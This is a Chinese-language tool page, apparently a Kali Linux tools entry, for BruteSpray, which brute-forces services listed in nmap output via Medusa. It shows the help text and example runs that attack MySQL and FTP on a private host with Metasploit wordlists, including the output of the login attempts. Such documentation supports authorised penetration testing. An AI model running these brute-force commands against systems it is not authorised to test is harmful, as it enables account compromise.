BruteSpray 介绍

BruteSpray以nmap GNMAP / XML输出,自动暴力破解,默认使用medusa凭证。BruteSpray甚至可以使用里面的 Nmap -sv找到非标准端口。

作者:Shane Young (@x90skysn3k) and Jacob Robles (@shellfail)
证书:麻省理工学院(Massachu-setts Institute of Technology)

工具来源
工具主页
brutespray 安装包

brutespray – Python 爆破工具

root@kali:~# brutespray -h
 brutespray.py v1.5.2
 Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
 Inspired by: Leon Johnson/@sho-luv
 Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>

usage: brutespray [-h] -f FILE [-o OUTPUT] [-s SERVICE] [-t THREADS]
            [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME]
            [-p PASSWORD] [-c] [-i]

Usage: python brutespray.py <OPTIONS>

optional arguments:

  -h, --help   show this help message and exit

Menu Options:
  -f FILE, --file FILE  GNMAP or XML file to parse
  -o OUTPUT, --output OUTPUT
                        Directory containing successful attempts
  -s SERVICE, --service SERVICE
                        specify service to attack
  -t THREADS, --threads THREADS
                        number of medusa threads
  -T HOSTS, --hosts HOSTS
                        number of hosts to test concurrently
  -U USERLIST, --userlist USERLIST
                        reference a custom username file
  -P PASSLIST, --passlist PASSLIST
                        reference a custom password file
  -u USERNAME, --username USERNAME
                        specify a single username
  -p PASSWORD, --password PASSWORD
                        specify a single password
  -c, --continuous     keep brute-forcing after success
  -i, --interactive     interactive mode

brutespray 用法示例

在nas攻击所有服务。gnmap与特定的用户列表(unix_users.txt)和密码(password.lst)。

root@kali:~# brutespray --file nas.gnmap -U /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/password.lst --threads 3 --hosts 1
 brutespray.py v1.5.2
 Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
 Inspired by: Leon Johnson/@sho-luv
 Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>

Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...  \

Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mysql] Host: 192.168.86.4 (1 of 1, 0 complete) User: 4Dgifts (1 of 111, 0 complete) Password: !@#$%^& (1 of 88396 complete)
ACCOUNT CHECK: [mysql] Host: 192.168.86.4 (1 of 1, 0 complete) User: 4Dgifts (1 of 111, 0 complete) Password: !@#$% (2 of 88396 complete)
ACCOUNT CHECK: [mysql] Host: 192.168.86.4 (1 of 1, 0 complete) User: 4Dgifts (1 of 111, 0 complete) Password: !@#$%^ (3 of 88396 complete)

交互模式,只暴力破解FTP服务。

root@kali:~# brutespray -i -f nas.gnmap
 brutespray.py v1.5.2
 Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
 Inspired by: Leon Johnson/@sho-luv
 Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>

Loading File: /

Welcome to interactive mode!

WARNING: Leaving an option blank will leave it empty and refer to default

Available services to brute-force:
Service: ftp on port 21 with 1 hosts
Service: ssh on port 22 with 1 hosts
Service: mysql on port 3306 with 1 hosts

Enter services you want to brute - default all (ssh,ftp,etc): ftp
Enter the number of parallel threads (default is 2): 4
Enter the number of parallel hosts to scan per service (default is 1): 1
Would you like to specify a wordlist? (y/n): y
Enter a userlist you would like to use: /usr/share/wordlists/metasploit/unix_users.txt
Enter a passlist you would like to use: /usr/share/wordlists/metasploit/password.lst
Would to specify a single username or password (y/n): n

Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...  \

Brute-Forcing...